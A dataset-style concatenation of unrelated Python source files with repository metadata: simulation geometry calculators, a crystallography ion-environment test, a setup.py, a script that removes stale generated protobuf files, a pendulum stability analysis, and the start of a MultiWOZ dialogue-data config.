| 32.705882 | 99 | 0.753597 | 69 | 556 | 5.898551 | 0.594203 | 0.095823 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010438 | 0.138489 | 556 | 16 | 100 | 34.75 | 0.839248 | 0.178058 | 0 | 0 | 0 | 0 | 0.182819 | 0.066079 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
b8f295ce12bf7401ea1d40884fb3f417f25a7bfd | 6,907 | py | Python | stomasimulator/febio/xplt/xplt_calcs.py | woolfeh/stomasimulator | ead78b78809f35c17e2d784259bdeb56589a9d1c | [
"MIT"
] | 2 | 2017-07-27T12:57:26.000Z | 2017-07-28T13:55:15.000Z | stomasimulator/febio/xplt/xplt_calcs.py | woolfeh/stomasimulator | ead78b78809f35c17e2d784259bdeb56589a9d1c | [
"MIT"
] | null | null | null | stomasimulator/febio/xplt/xplt_calcs.py | woolfeh/stomasimulator | ead78b78809f35c17e2d784259bdeb56589a9d1c | [
"MIT"
] | 1 | 2020-06-02T15:31:04.000Z | 2020-06-02T15:31:04.000Z | import stomasimulator.geom.geom_utils as geom
class AttributeCalculator(object):
""" Abstraction for calculations performed on XPLT state data """
def __init__(self, prefix, reference_data, dimensionality, lambda_fn=None):
self.prefix = '' if prefix is None else prefix
self.reference_data = reference_data
self.dimensionality = dimensionality
self.lambda_fn = (lambda x: x) if lambda_fn is None else lambda_fn
def calculate(self, nid_pt_dict, extras=None):
""" Perform the calculation
:param nid_pt_dict: dictionary of an integer 'node id' to a Point object
:param extras: passed on to the subclass
:return: a dictionary containing label-result pairs from the calculation
:rtype: dict
"""
data = self._calculate(nid_pt_dict, extras)
if self.dimensionality == 1:
data = (data,)
return {k: self.lambda_fn(v) for k, v in zip(self.labels(), data)}
def _calculate(self, nid_pt_dict, extras):
""" Calculation implementation - to be overridden in subclasses """
pass
def labels(self):
""" Get the labels for the calculation results """
suffices = self.calculation_suffices()
assert len(suffices) == self.dimensionality, 'Error! Data label dimensionality mismatch.'
fmt_string = '{}{}' if len(self.prefix) == 0 or len(suffices[0]) == 0 else '{}-{}'
return [fmt_string.format(self.prefix, suffix) for suffix in suffices]
def calculation_suffices(self):
""" These suffices are appended to the labels of the calculation result """
return ['', ] * self.dimensionality
def _get_point(ref_pt, id_pt_dict):
return id_pt_dict.get(ref_pt) if isinstance(ref_pt, int) else ref_pt
class DistanceCalculator(AttributeCalculator):
""" Distance between two points """
def __init__(self, prefix, node_pair, lambda_fn=None):
node_0 = node_pair[0]
node_1 = node_pair[1]
reference_data = (node_0 if node_0.id is None else node_0.id,
node_1 if node_1.id is None else node_1.id)
super(DistanceCalculator, self).__init__(prefix=prefix,
reference_data=reference_data,
dimensionality=1,
lambda_fn=lambda_fn)
def _calculate(self, nid_pt_dict, extras):
pt_0 = _get_point(self.reference_data[0], nid_pt_dict)
pt_1 = _get_point(self.reference_data[1], nid_pt_dict)
return pt_0.distance(pt_1)
class DirectionalDistanceCalculator(DistanceCalculator):
""" Signed distance calculator """
def __init__(self, prefix, node_pair, direction, lambda_fn=None):
""" Calculate a distance in a specified direction
:param prefix:
:param node_pair: two Points - further along 'direction' than node_pair[1] so that 'np[0] - np[1]'
should be in the direction of 'direction'
:param direction: the direction vector
:param lambda_fn:
"""
super(DirectionalDistanceCalculator, self).__init__(prefix=prefix,
node_pair=node_pair,
lambda_fn=lambda_fn)
self.direction = direction.unit()
def _calculate(self, nid_pt_dict, extras):
pt_0 = _get_point(self.reference_data[0], nid_pt_dict)
pt_1 = _get_point(self.reference_data[1], nid_pt_dict)
is_in_right_direction = (pt_0 - pt_1) * self.direction > 0.0
return pt_0.distance(pt_1) if is_in_right_direction else 0.0
class AreaCalculator2D(AttributeCalculator):
""" Calculate area from a list of points (assumed to be in xy plane) """
def __init__(self, prefix, boundary_pts, lambda_fn=None):
super(AreaCalculator2D, self).__init__(prefix=prefix,
reference_data=boundary_pts,
dimensionality=1,
lambda_fn=lambda_fn)
def _calculate(self, nid_pt_dict, extras):
updated_pore_pts = [nid_pt_dict[pt.id] for pt in self.reference_data]
pore_area = geom.calculate_polygon_area(updated_pore_pts)
return pore_area
class AreaCalculator3D(AttributeCalculator):
""" Calculate an area from a list of facets """
def __init__(self, prefix, facet_list):
super(AreaCalculator3D, self).__init__(prefix=prefix,
reference_data=facet_list,
dimensionality=1)
def _calculate(self, nid_pt_dict, extras):
area = geom.calculate_surface_area(nid_pt_dict, self.reference_data)
return area
class AreaVolumeCalculator(AttributeCalculator):
""" Perform a combined calculation to get the surface area and volume given a list of facets """
def __init__(self, prefix, facet_list):
super(AreaVolumeCalculator, self).__init__(prefix=prefix,
reference_data=facet_list,
dimensionality=2)
def _calculate(self, nid_pt_dict, extras):
volume, area = geom.calculate_volume_and_area(nid_pt_dict, self.reference_data)
return area, volume
def calculation_suffices(self):
return 'area', 'volume'
class XpltReaderMetrics(object):
""" Identify the metrics that will be calculated for the XpltReader """
def __init__(self, comparison_helper=None, is_mesh_calculation_on=False):
"""
:param comparison_helper: Comparison helper for the stoma
:type stoma_cfg: sc.ComparisonHelper
:param is_mesh_calculation_on: Whether to calculate the mesh metrics (or not)
:type is_mesh_calculation_on: bool
"""
self.comparison_helper = comparison_helper
self.is_mesh_calculation_on = is_mesh_calculation_on
@property
def is_compare_vs_open_stoma_on(self):
"""
:return: Whether or not to perform the comparison
:rtype: bool
"""
return self.comparison_helper is not None
def evaluate_metric(self, sim_state):
"""
Calculate the metric and percent difference vs. each measurement
:param sim_state: State object holding data from the simulation
:type sim_state: State
:return: Each item is a pair comprising a name (key) and its float value
:rtype: list of tuple
"""
result = self.comparison_helper.perform_comparison(state_pressure=sim_state.time,
state_data=sim_state.attributes)
return result
if __name__ == '__main__':
pass
| 37.538043 | 106 | 0.624005 | 822 | 6,907 | 4.954988 | 0.209246 | 0.026516 | 0.035355 | 0.029462 | 0.228333 | 0.214829 | 0.176528 | 0.153695 | 0.153695 | 0.09698 | 0 | 0.008851 | 0.296656 | 6,907 | 183 | 107 | 37.743169 | 0.829559 | 0.224989 | 0 | 0.258427 | 0 | 0 | 0.013647 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 1 | 0.224719 | false | 0.022472 | 0.011236 | 0.022472 | 0.449438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8fc2913caa7185f3d28c952db02652d27ed5b76 | 8,940 | py | Python | mmtbx/ions/tst_environment.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | mmtbx/ions/tst_environment.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | mmtbx/ions/tst_environment.py | jbeilstenedmands/cctbx_project | c228fb15ab10377f664c39553d866281358195aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | # -*- coding: utf-8; py-indent-offset: 2 -*-
from __future__ import division
from mmtbx.ions.environment import ChemicalEnvironment
import mmtbx.ions.identify
from mmtbx import ions
import mmtbx.monomer_library.pdb_interpretation
from mmtbx import monomer_library
from mmtbx.ions.environment import chem_carboxy, chem_amide, chem_backbone, \
chem_water, chem_phosphate, \
chem_nitrogen_primary, chem_nitrogen_secondary, \
chem_chloride, chem_oxygen, chem_nitrogen, chem_sulfur
import libtbx.load_env
from collections import OrderedDict, Counter
import os
import sys
def exercise () :
if not libtbx.env.has_module("phenix_regression"):
print "Skipping {}".format(os.path.split(__file__)[1])
return
models = OrderedDict([
("2qng", [
Counter({chem_oxygen: 7, chem_carboxy: 2, chem_water: 2,
chem_backbone: 3}),
Counter({chem_oxygen: 6, chem_carboxy: 3, chem_water: 1,
chem_backbone: 2}),
]),
("3rva", [
Counter({chem_oxygen: 6, chem_carboxy: 4, chem_water: 2}),
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_nitrogen: 4, chem_nitrogen_primary: 1,
chem_nitrogen_secondary: 3, chem_backbone: 3}),
]),
("1mjh", [
Counter({chem_oxygen: 6, chem_water: 3, chem_phosphate: 3}),
Counter({chem_oxygen: 6, chem_water: 3, chem_phosphate: 3}),
]),
("4e1h", [
Counter({chem_oxygen: 6, chem_carboxy: 4}),
Counter({chem_oxygen: 6, chem_carboxy: 3}),
Counter({chem_oxygen: 6, chem_carboxy: 3}),
]),
("2xuz", [
Counter({chem_oxygen: 6}),
]),
("3zli", [
Counter({chem_nitrogen: 2, chem_oxygen: 4, chem_nitrogen_secondary: 2,
chem_carboxy: 1, chem_water: 1}),
Counter({chem_sulfur: 4}),
Counter({chem_nitrogen: 2, chem_oxygen: 4, chem_nitrogen_secondary: 2,
chem_carboxy: 1, chem_water: 1}),
Counter({chem_sulfur: 4}),
]),
("3e0f", [
Counter({chem_nitrogen: 2, chem_oxygen: 4, chem_nitrogen_secondary: 2,
chem_carboxy: 2, chem_phosphate: 2}),
Counter({chem_nitrogen: 2, chem_oxygen: 2, chem_nitrogen_secondary: 2,
chem_carboxy: 1, chem_phosphate: 1}),
Counter({chem_nitrogen: 2, chem_oxygen: 3, chem_nitrogen_secondary: 2,
chem_carboxy: 2, chem_phosphate: 1}),
]),
("3dkq", [
Counter({chem_nitrogen: 4, chem_oxygen: 1, chem_nitrogen_secondary: 4,
chem_carboxy: 1}),
Counter({chem_nitrogen: 2, chem_oxygen: 1, chem_nitrogen_secondary: 2,
chem_carboxy: 1}),
Counter({chem_nitrogen: 4, chem_oxygen: 1, chem_nitrogen_secondary: 4,
chem_carboxy: 1}),
]),
("2o8q", [
Counter({chem_nitrogen: 3, chem_oxygen: 3, chem_nitrogen_secondary: 3,
chem_water: 3}),
Counter({chem_nitrogen: 3, chem_oxygen: 3, chem_nitrogen_secondary: 3,
chem_water: 3}),
]),
("1tgg", [
Counter({chem_oxygen: 5, chem_chloride: 1, chem_carboxy: 4,
chem_water: 1}),
Counter({chem_oxygen: 3, chem_chloride: 2, chem_carboxy: 3}),
Counter({chem_oxygen: 4, chem_chloride: 2, chem_carboxy: 4}),
]),
("3zu8", [
Counter({chem_oxygen: 7, chem_carboxy: 3, chem_water: 1,
chem_backbone: 2}),
Counter({chem_nitrogen: 4, chem_oxygen: 1, chem_nitrogen_primary: 1,
chem_nitrogen_secondary: 3, chem_carboxy: 1, chem_backbone: 3}),
]),
("1ofs", [
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
]),
("3ul2", [
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_backbone: 1,
chem_water: 2}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
]),
("3snm", [
Counter({chem_oxygen: 5, chem_amide: 1, chem_carboxy: 3,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 3, chem_nitrogen_secondary: 1,
chem_carboxy: 3}),
]),
("3qlq", [
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_oxygen: 7, chem_amide: 1, chem_carboxy: 3, chem_water: 2,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 5, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 2}),
]),
("2gdf", [
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_oxygen: 6, chem_amide: 1, chem_carboxy: 3, chem_water: 1,
chem_backbone: 1}),
Counter({chem_nitrogen: 1, chem_oxygen: 4, chem_nitrogen_secondary: 1,
chem_carboxy: 3, chem_water: 1}),
Counter({chem_oxygen: 6, chem_amide: 1, chem_carboxy: 3, chem_water: 1,
chem_backbone: 1}),
]),
("1q8h", [
Counter({chem_oxygen: 7, chem_carboxy: 6, chem_water: 1}),
Counter({chem_oxygen: 7, chem_carboxy: 4, chem_water: 3}),
Counter({chem_oxygen: 8, chem_carboxy: 6, chem_water: 2}),
]),
])
for model, expected_environments in models.items():
pdb_path = libtbx.env.find_in_repositories(
relative_path = os.path.join(
"phenix_regression", "mmtbx", "ions", model + ".pdb"),
test = os.path.isfile
)
mon_lib_srv = monomer_library.server.server()
ener_lib = monomer_library.server.ener_lib()
processed_pdb_file = monomer_library.pdb_interpretation.process(
mon_lib_srv = mon_lib_srv,
ener_lib = ener_lib,
file_name = pdb_path,
raw_records = None,
force_symmetry = True,
log = libtbx.utils.null_out()
)
geometry = \
processed_pdb_file.geometry_restraints_manager(show_energies = False)
xray_structure = processed_pdb_file.xray_structure()
pdb_hierarchy = processed_pdb_file.all_chain_proxies.pdb_hierarchy
connectivity = geometry.shell_sym_tables[0].full_simple_connectivity()
manager = mmtbx.ions.identify.manager(
fmodel = None,
pdb_hierarchy = pdb_hierarchy,
xray_structure = xray_structure,
connectivity = connectivity)
elements = set(ions.DEFAULT_IONS + ions.TRANSITION_METALS)
elements.difference_update(["CL"])
metals = [i_seq for i_seq, atom in enumerate(manager.pdb_atoms)
if atom.fetch_labels().resname.strip().upper() in elements]
assert len(metals) == len(expected_environments)
for index, metal, expected_environment in \
zip(xrange(len(metals)), metals, expected_environments):
env = ChemicalEnvironment(
metal,
manager.find_nearby_atoms(metal, filter_by_two_fofc = False),
manager
)
if env.chemistry != expected_environment:
print "Problem detecting chemistry environment in", model, index
print "Found: ", env.chemistry
print "Should be:", expected_environment
sys.exit()
print "OK"
if __name__ == "__main__":
exercise()
| 41.581395 | 80 | 0.631767 | 1,137 | 8,940 | 4.644679 | 0.146878 | 0.129521 | 0.072714 | 0.084832 | 0.642871 | 0.602159 | 0.567885 | 0.526605 | 0.503882 | 0.439879 | 0 | 0.039216 | 0.24698 | 8,940 | 214 | 81 | 41.775701 | 0.745247 | 0.004698 | 0 | 0.44 | 0 | 0 | 0.022482 | 0 | 0 | 0 | 0 | 0 | 0.005 | 0 | null | null | 0 | 0.055 | null | null | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b8fecc2152a699d192482875bb377312659faf77 | 577 | py | Python | async-utils/setup.py | goc9000/python-library | 0a4a09278df6e84061baedda8997071e2201103f | [
"MIT"
] | null | null | null | async-utils/setup.py | goc9000/python-library | 0a4a09278df6e84061baedda8997071e2201103f | [
"MIT"
] | null | null | null | async-utils/setup.py | goc9000/python-library | 0a4a09278df6e84061baedda8997071e2201103f | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='atmfjstc-async-utils',
version='0.1.0',
author_email='atmfjstc@protonmail.com',
package_dir={'': 'src'},
packages=find_packages(where='src'),
install_requires=[
],
zip_safe=True,
description="Utilities for async code",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Framework :: AsyncIO",
"Typing :: Typed",
],
python_requires='>=3.9',
)
| 20.607143 | 49 | 0.60312 | 60 | 577 | 5.683333 | 0.8 | 0.070381 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013793 | 0.246101 | 577 | 27 | 50 | 21.37037 | 0.770115 | 0 | 0 | 0.1 | 0 | 0 | 0.389948 | 0.039861 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.05 | 0 | 0.05 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
770214b97687e419b49ca7614e24a42a26a9954c | 2,092 | py | Python | tools/clean_autogen_protos.py | embeddery/stackrox | d653406651df4331a714839ec2c0a23a93425c64 | [
"Apache-2.0"
] | 22 | 2022-03-31T14:32:18.000Z | 2022-03-31T22:11:30.000Z | tools/clean_autogen_protos.py | embeddery/stackrox | d653406651df4331a714839ec2c0a23a93425c64 | [
"Apache-2.0"
] | 5 | 2022-03-31T14:35:28.000Z | 2022-03-31T22:40:13.000Z | tools/clean_autogen_protos.py | embeddery/stackrox | d653406651df4331a714839ec2c0a23a93425c64 | [
"Apache-2.0"
] | 4 | 2022-03-31T16:33:58.000Z | 2022-03-31T22:19:26.000Z | #!/usr/bin/env python3
import argparse
import pathlib
GENERATED_EXTENSIONS = ["pb.go", "pb.gw.go", "swagger.json"]
def find_files(path, fileglob):
files_full = list(path.glob(fileglob))
return files_full
def strip_path_extension(filelist):
# We cannot use Path.stem directly as it doesn't handle double extensions (.pb.go) correctly
files_extensionless = list(map(lambda f: (str(f).replace("".join(f.suffixes), "")), filelist))
files_name_only = list(map(lambda f: pathlib.Path(f).stem, files_extensionless))
return files_name_only
def find_difference(generated_list, proto_list):
difference = set(generated_list) - set(proto_list)
return difference
def filter_only_gen_files(candidates):
return [x for x in candidates if any(str(x.name).endswith(extension) for extension in GENERATED_EXTENSIONS)]
def find_in_list(target_list, searchterms):
searchterms = [f"{x}." for x in searchterms] # Add a dot to only match full filenames
return [x for x in target_list if any(str(x.name).startswith(term) for term in searchterms )]
def remove_files(target_list):
for target in target_list:
target.unlink()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--protos", type=pathlib.Path, help="Path to proto dir")
parser.add_argument("--generated", type=pathlib.Path, help="Path to generated sources dir")
v = parser.parse_args()
proto_files = find_files(v.protos, "**/*.proto")
generated_files = [f
for file_list in (find_files(v.generated, f'**/*.{ext}') for ext in GENERATED_EXTENSIONS)
for f in file_list]
proto_stripped = strip_path_extension(proto_files)
generated_stripped = strip_path_extension(generated_files)
diff = find_difference(generated_stripped, proto_stripped)
full_paths = find_in_list(generated_files, diff)
final_diff = filter_only_gen_files(full_paths)
if len(final_diff) > 0:
print(f"Removing: {final_diff}")
remove_files(final_diff)
if __name__ == '__main__':
main()
| 31.223881 | 112 | 0.707935 | 293 | 2,092 | 4.8157 | 0.320819 | 0.028349 | 0.038271 | 0.014883 | 0.072289 | 0.035436 | 0 | 0 | 0 | 0 | 0 | 0.001167 | 0.180688 | 2,092 | 66 | 113 | 31.69697 | 0.822054 | 0.07218 | 0 | 0 | 1 | 0 | 0.074303 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.175 | false | 0 | 0.05 | 0.025 | 0.35 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77076be0aee637dc1db01b51cb1e1bf652954a05 | 7,016 | py | Python | src/single_pendulum.py | dpopchev/Computation_python | 790bfc451b003ecbc626867035dc03a7b55d1fb9 | [
"MIT"
] | null | null | null | src/single_pendulum.py | dpopchev/Computation_python | 790bfc451b003ecbc626867035dc03a7b55d1fb9 | [
"MIT"
] | null | null | null | src/single_pendulum.py | dpopchev/Computation_python | 790bfc451b003ecbc626867035dc03a7b55d1fb9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# do not hesitate to debug
import pdb
# python computation modules and visualization
import numpy as np
import sympy as sy
import scipy as sp
import matplotlib.pyplot as plt
from sympy import Q as syQ
sy.init_printing(use_latex=True,forecolor="White")
def Lyapunov_stability_test_linear(ev):
''' test if a linear homogeneous system with constant coefficients is stable
in the sense of Lyapunov by checking the theorem conditions against the
provided eigenvalues
source https://www.math24.net/stability-theory-basic-concepts/
TODO taking into account eigenvalue multiplicity '''
# the criteria result will be saved here
r = None
# system is asymptotically stable if only if
# all eigenvalues have negative real parts
r = 'asymptotically stable' if ( not r
and all(sy.ask(syQ.negative(sy.re(_))) for _ in ev) ) else None
# system is stable if and only if
# all eigenvalues have nonpositive real parts
# TODO incorporate algebraic and geometric multiplicity criteria
r = 'stable' if ( not r
and all(sy.ask(syQ.nonpositive(sy.re(_))) for _ in ev) ) else None
# system is unstable if
# at least one eigenvalue has positive real part
# TODO incorporate algebraic and geometric multiplicity criteria
r = 'unstable' if ( not r
and any(sy.ask(syQ.positive(sy.re(_))) for _ in ev) ) else None
return r
def Lyapunov_stability_test_nonlinear(ev):
''' test if the fixed point of a nonlinear structure stable system
is stable, unstable, critical or impossible to determine using Lyapunov
criteria of first order and thus other methods are needed
TODO tests are only applicable for structurally stable systems, i.e.
with purely imaginary eigenvalues are not taken into account
source https://www.math24.net/stability-first-approximation/ '''
# the criteria result will be saved here
r = None
# system is asymptotically stable if only if
# all eigenvalues have negative real parts
r = 'asymptotically stable' if ( not r
and all(sy.ask(syQ.negative(sy.re(_))) for _ in ev) ) else None
# system is unstable if
# at least one eigenvalue has positive real part
r = 'unstable' if ( not r
and any(sy.ask(syQ.positive(sy.re(_))) for _ in ev) ) else None
# if all eigenvalues have non-positive real parts,
# and there is at least one eigenvalue with zero real part
# then fixed point can be stable or unstable and other methods should be
# used, thus mark the point critical
r = 'critical' if ( not r
and all(sy.ask(Q.nonpositive(sy.re(_))) for _ in ev)
and any(sy.re(_) == 0 for _ in ev)
) else None
return r if r else 'not decided'
def RouthHurwitz_Criterion(p):
''' return principal minors of Hurwitz matrix as sympy polynomials, which if
all are positive it is sufficient condition for asymptotic stability
NOTE: if all n-1 principal minors are positive, and nth minor is zero,
the system is at the boundary of stability, with two cases:
a_n = 0 -- one of the root is zero and system is on the boundary of
aperiodic stability
n-1 minor is zero -- there are two complex conjugate imaginary roots and
the system is at boundary of oscillatory stability
source https://www.math24.net/routh-hurwitz-criterion/ '''
# initial key and index pair needed to create Hurwitz matrix via sympy banded
# each entry is of the type [ dictionary key, coefficient slice ]
idxs = [ [ 1, 0 ] ]
# generate next key by decrementing with 1
genKey = lambda _: _ - 1
# generate next index by incrementing with 1 if key was nonnegative
# or with 2 if key is negative
genSlice = lambda _, __: __ + 1 if _ >= 0 else __ + 2
# fill the rest pairs w.r.t. the polynomial degree - 1, as we already have
# one entry
for _ in range(p.degree() - 1):
key = genKey(idxs[-1][0])
idxs.append( [ key, genSlice(key, idxs[-1][1] ) ] )
# create the matrix itself
H = sy.banded({ k: p.all_coeffs()[v:] for k, v in idxs })
return [ H[:_, :_].det() if _ > 0 else p.LC() for _ in range(0, p.degree()+1) ]
# define independent variable
t = sy.symbols('t', real=True)
# define dependent variables individually and pact them in an variable
theta, omega = sy.symbols(r'\theta, \omega', real = True)
Y = theta, omega
# define free parameters of they system and pack them in a variable
g, L = sy.symbols('g, L', positive = True)
parms = g, L
# create rhs as sympy expressions
theta_dt = omega
omega_dt = -(g/L)*sy.sin(theta)
rhs = {}
rhs['sympy'] = sy.Matrix([theta_dt, omega_dt])
# convert the sympy matrix function to numpy function with usual signature
rhs['numpy'] = sy.lambdify((t, Y, *parms), rhs['sympy'], 'numpy')
# create Jacobian matrix as sympy expression
J = {}
J['sympy'] = rhs['sympy'].jacobian(Y)
# convert the sympy Jacobian expression to numpy function with usual signature
J['numpy'] = sy.lambdify((t, Y, *parms), J['sympy'])
# calculate rhs fixed points
fixed_points = sy.solve(rhs['sympy'], Y)
# substitute each fixed point in the Jacobian
# and calculate the eigenvalues
J_fixed = {}
for i, fp in enumerate(fixed_points):
J_subs = J['sympy'].subs( [(y, v) for y, v in zip(Y, fp)])
#J_eigenvals = J_subs.eigenvals(multiple=True)
J_eigenvals = J_subs.eigenvals()
# save the fixed point results in more details
# most importantly the eigenvalues and their corresponding multiplicity
J_fixed[i] = {
'fixed point': fp,
'subs': J_subs,
'eigenvalues': list(J_eigenvals.keys()),
'multiplicity': list(J_eigenvals.values())
}
def plot_phase_portrait(ax, rhs, section, args=(), n_points=25):
''' plot section of phase space of a field defined via its rhs '''
# create section grid
x_grid, y_grid = np.meshgrid(
np.linspace( section[0][0], section[0][1], n_points ),
np.linspace( section[1][0], section[1][1], n_points )
)
# calculate rhs on the grid
xx, yy = rhs(None, ( x_grid, y_grid ), *args)
# compute vector norms and make line width proportional to them
# i.e. greater the vector length, the thicker the line
# TODO not sure why rhs returns different shape
vector_norms = np.sqrt(xx[0]**2 + yy[0]**2)
lw = 0.25 + 3*vector_norms/vector_norms.max()
# plot the phase portrait
ax.streamplot(
x_grid, y_grid,
xx[0], yy[0],
linewidth = lw,
arrowsize = 1.2,
density = 1
)
return ax
def plot_main():
fig, ax = plt.subplots()
ax = plot_phase_portrait(
ax,
rhs['numpy'],
(
( -np.pi, np.pi ),
( -2*np.pi, 2*np.pi)
),
args = ( 5, 1 ),
)
if __name__ == '__main__':
plot_main()
| 34.392157 | 83 | 0.651511 | 1,036 | 7,016 | 4.333012 | 0.303089 | 0.016039 | 0.010916 | 0.012029 | 0.256182 | 0.222098 | 0.175986 | 0.165738 | 0.140566 | 0.134774 | 0 | 0.010699 | 0.253991 | 7,016 | 203 | 84 | 34.561576 | 0.846962 | 0.489453 | 0 | 0.11236 | 0 | 0 | 0.06043 | 0 | 0 | 0 | 0 | 0.014778 | 0 | 1 | 0.05618 | false | 0 | 0.067416 | 0 | 0.168539 | 0.011236 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7714068c84e56c46ce9cbe59a4ed57f2565d3970 | 1,750 | py | Python | E2E_TOD/config.py | kingb12/pptod | 4cc920494b663c5352a507ed1e32f1e2509a8c93 | [
"Apache-2.0"
] | 54 | 2021-10-02T13:31:09.000Z | 2022-03-25T03:44:54.000Z | E2E_TOD/config.py | programmeddeath1/pptod | 52d26ddc7b917c86af721e810a202db7c7d3b398 | [
"Apache-2.0"
] | 8 | 2021-11-10T06:05:20.000Z | 2022-03-25T03:27:29.000Z | E2E_TOD/config.py | programmeddeath1/pptod | 52d26ddc7b917c86af721e810a202db7c7d3b398 | [
"Apache-2.0"
] | 14 | 2021-10-02T13:31:01.000Z | 2022-03-27T15:49:33.000Z | import logging, time, os
class Config:
def __init__(self, data_prefix):
# data_prefix = r'../data/'
self.data_prefix = data_prefix
self._multiwoz_damd_init()
def _multiwoz_damd_init(self):
self.vocab_path_train = self.data_prefix + '/multi-woz-processed/vocab'
self.data_path = self.data_prefix + '/multi-woz-processed/'
self.data_file = 'data_for_damd.json'
self.dev_list = self.data_prefix + '/multi-woz/valListFile.json'
self.test_list = self.data_prefix + '/multi-woz/testListFile.json'
self.dbs = {
'attraction': self.data_prefix + '/db/attraction_db_processed.json',
'hospital': self.data_prefix + '/db/hospital_db_processed.json',
'hotel': self.data_prefix + '/db/hotel_db_processed.json',
'police': self.data_prefix + '/db/police_db_processed.json',
'restaurant': self.data_prefix + '/db/restaurant_db_processed.json',
'taxi': self.data_prefix + '/db/taxi_db_processed.json',
'train': self.data_prefix + '/db/train_db_processed.json',
}
